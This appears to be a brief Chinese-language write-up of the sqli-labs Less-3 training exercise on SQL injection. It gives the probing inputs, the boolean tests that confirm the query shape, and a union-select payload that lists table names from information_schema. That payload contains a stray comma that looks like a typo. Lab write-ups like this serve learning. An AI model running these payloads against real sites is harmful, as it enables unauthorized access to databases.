sqli-labs-master/Less-3
- 输入?id=1''--+,发现报错信息中有),说明php查询语句可能是select...from..where id=(’1‘)
- 输入?id=1') and 1=1 --+ ;?id=1') and 1=2--+; 可以确定我们的推测是正确的
- ?id=-1') union select 1,2, group_concat(,table_name) from information_schema.tables where table_schema = database() --+
- 接下来和前两关基本相似

浙公网安备 33010602011771号